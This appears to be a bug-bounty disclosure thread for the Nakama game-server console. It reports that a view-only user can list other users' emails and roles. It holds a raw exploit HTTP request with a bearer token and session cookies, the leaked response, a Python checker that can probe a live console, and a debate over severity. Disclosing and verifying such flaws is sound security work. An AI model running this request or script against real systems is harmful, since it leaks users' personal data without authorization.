Unprivileged user can see user details like email, role, etc. in heroiclabs/nakama
Reported on
Apr 2nd 2022
Description
A view-only user can see user details like email, role, etc.
I see there are different types of user roles in Nakama. Based on the role, users have some limits. But this bug is a privilege escalation bug.
Proof of Concept
1. From the super admin account, add a new user called user-B with view-only permission.
2. Now log in to the user-B account; here he can't see other users in his account.
Now user-B sends the below request, which will disclose all available users:
GET /v2/console/user HTTP/1.1
Host: 127.0.0.1:7351
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c24iOiJ1c2VyMiIsImVtYSI6ImFnc3lkZ2F1QGFzZGEuY29tIiwicm9sIjo0LCJleHAiOjE2NDkwMDUxNzEsImNraSI6IjRhNmYyYjBhLTgxY2ItNGZiYS05MmUxLTNlZTRhZmRlNDEzYyJ9.WXkLUmcTd7MacFd-s_zMdXlQbbxaxDiQlhv1GeB3wws
Connection: close
Referer: http://127.0.0.1:7351/
Cookie: __profilin=p%3Dt; bagisto_bugbounty_session=eyJpdiI6Im1JaktwamRWQUlkcFJ3bDRnYU1CS2c9PSIsInZhbHVlIjoiS29YSTVPQVkvOCtXcW5tTDhoeDVTcGVOVEQ0RlFWcWtudFVPN2NWaktOOTVjRWRibjBwWVhwdmJFcy9McGgzNHJlUzhyc1NJOXVMMWI2YmNNaWxSRWtKNTFVN1dHL0tWV2EwWmVhd0RVcHQvNVNPcWpqWmNzQVQzMkVaZ0U0R3oiLCJtYWMiOiJjZjdiY2ZlNTY1MTc5MjJiODQ0MzJmNjE3N2Y3YWIyNWU1ZjcyZWY1MzRlMDNhMjlkOTRkZTFiMDRiNWNkOWRhIn0%3D; xbackbone_session=ia673umahu6to3r91ilgc38vmq
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Account: TEST2
Response:
{"users":[{"username":"user2", "email":"agsydgau@asda.com", "role":4}, {"username":"by_admin1", "email":"by_admin@asda.com", "role":4}, {"username":"user1", "email":"user1@localhost.com", "role":3}]}
Impact
A user with view-only permission can see other users' email details.
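As an added example (not code from the report or from the Nakama project), the Python script below reproduces the check offline: it decodes the role claim from the console token in the proof-of-concept request and flags a `/v2/console/user` response that returns accounts other than the caller's own to a view-only user. The endpoint and the token claims (`usn`, `rol`) are taken from the request and response above; role value 4 is treated as the view-only role only because that is what user-B's token carries. The optional live check assumes a console login endpoint `POST /v2/console/authenticate` taking JSON `{"username", "password"}` and returning `{"token": ...}`; that endpoint is an assumption about the console API, not something the report shows, and it is not exercised offline.

```python
import base64
import json
import urllib.error
import urllib.request

# Console token copied from the proof-of-concept request above (HS256 JWT).
# Only the payload is decoded here; the signature is never verified.
POC_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c24iOiJ1c2VyMiIsImVtYSI6ImFnc3lkZ2F1QGFzZGEuY29tIiwicm9sIjo0LCJleHAiOjE2NDkwMDUxNzEs"
    "ImNraSI6IjRhNmYyYjBhLTgxY2ItNGZiYS05MmUxLTNlZTRhZmRlNDEzYyJ9."
    "WXkLUmcTd7MacFd-s_zMdXlQbbxaxDiQlhv1GeB3wws"
)

# Constructed copy of the response body shown in the proof of concept.
POC_RESPONSE = {"users": [
    {"username": "user2", "email": "agsydgau@asda.com", "role": 4},
    {"username": "by_admin1", "email": "by_admin@asda.com", "role": 4},
    {"username": "user1", "email": "user1@localhost.com", "role": 3},
]}

# user-B was created as view-only and user-B's token carries rol=4, so this
# script treats role 4 as the view-only role (inferred from the report, not
# from Nakama's role definitions).
VIEW_ONLY_ROLE = 4


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_claims(token: str) -> dict:
    """Return the JWT payload for inspection; the signature is NOT checked."""
    _header, payload, _signature = token.split(".")
    return json.loads(b64url_decode(payload))


def leaked_users(caller_claims: dict, response: dict) -> list:
    """Accounts a view-only caller should not have been shown.

    A view-only user has no business listing other console users, so every
    record except the caller's own counts as leaked. Returns [] when the
    caller is not view-only or only their own record came back.
    """
    if caller_claims.get("rol") != VIEW_ONLY_ROLE:
        return []
    own = caller_claims.get("usn")
    return [u for u in response.get("users", []) if u.get("username") != own]


def check_live(base_url: str, username: str, password: str) -> list:
    """Optional check against a running console (assumed API, not run offline).

    Assumes POST /v2/console/authenticate accepts {"username","password"} and
    returns {"token": ...}; GET /v2/console/user is the endpoint from the PoC.
    """
    body = json.dumps({"username": username, "password": password}).encode()
    req = urllib.request.Request(base_url + "/v2/console/authenticate", data=body,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req) as resp:
        token = json.load(resp)["token"]
    req = urllib.request.Request(base_url + "/v2/console/user",
                                 headers={"Authorization": "Bearer " + token})
    try:
        with urllib.request.urlopen(req) as resp:
            users = json.load(resp)
    except urllib.error.HTTPError as err:
        if err.code in (401, 403):
            return []  # listing refused for this role: nothing leaked
        raise
    return leaked_users(decode_jwt_claims(token), users)


if __name__ == "__main__":
    claims = decode_jwt_claims(POC_TOKEN)
    print("caller:", claims["usn"], "role:", claims["rol"])
    for user in leaked_users(claims, POC_RESPONSE):
        print("leaked:", user["username"], user["email"], user["role"])
```

Run offline, the script reports the two other console users (`by_admin1` and `user1`) as disclosed to the role-4 caller `user2`, which is the condition the report describes; an empty list after the fix means the listing is either refused or limited to the caller's own record.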
Thanks @ranjit-git for this. I've marked the issue as 'Low' due to the nature of the way the Nakama Console works, i.e. someone must trust you originally to create you an account first, and therefore this is not possible as an unknown individual. However, this will be fixed soon.
@maintainer Yes, a console user who doesn't have permission can fetch the details. I think this should be in the medium category. As this bug is a privilege escalation bug, it must already be a console user.
Here I calculated the CVSS score: https://ibb.co/3dsVRHc. I think you have put every impact to none.
Sorry, wrong image provided above; the correct calculated score is https://ibb.co/HgQbYrY
Here is the score calculated: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N&version=3.1. Impact can't be NONE. As this is a privilege escalation bug, it must have some impact.
Can you please update the severity?
There is no privilege that's escalated, and more practically there is no difference in the outcome: the 'bad actor' (who must already have an account and be known) cannot do anything further to the system, e.g. cannot delete player accounts, cannot delete Storage records and cannot create/delete console users. If so, please file it differently, as they are a bit more severe than what you've so far disclosed. Thanks!
Yes, agreed that the user can't modify the details. But still he can access information that he is not authorized to. Privilege escalation is not only about modifying data but also about leaking data. Just like in many applications such as GitHub, GitLab, Google Drive, Shopify, Facebook Page Manager, Linux OS, Windows OS, etc., here users may have many roles like viewer, editor, admin, developer, root, sudo (all these roles are trusted and added by the admin himself), and some roles are not permitted to see some information. If somehow a non-permitted role can see that information, then that's a privilege escalation bug. Privilege escalation is not only about modifying data.
@maintainer Can you please recheck the severity? I think the CVSS score should be 4.3 (Low).
@ranjit-git - please respect the assessment of the maintainer. Ultimately the decision lies with the maintainer, and so overly pushing for a certain conclusion around CVSS or the final state of the report will not be accepted.
@admin Yes, I always respect the maintainer. I was just trying to explain the impact here, as huntr looks for severity-based reports now.
This looks to be a duplicate of this: https://www.huntr.dev/bounties/c20a3868-93cc-4d6e-ac60-4a33db6eabc7
@Jamie - apologies, it looks like I've added my auth token to the URL above. Can you please sanitize and blacklist the token? Apologies.
@Mo - I have disabled access with the generic HeroicLabs token. I will redact it from the message and re-enable access with a new token shortly 👍 You will all still be able to access reports directly via your personal accounts.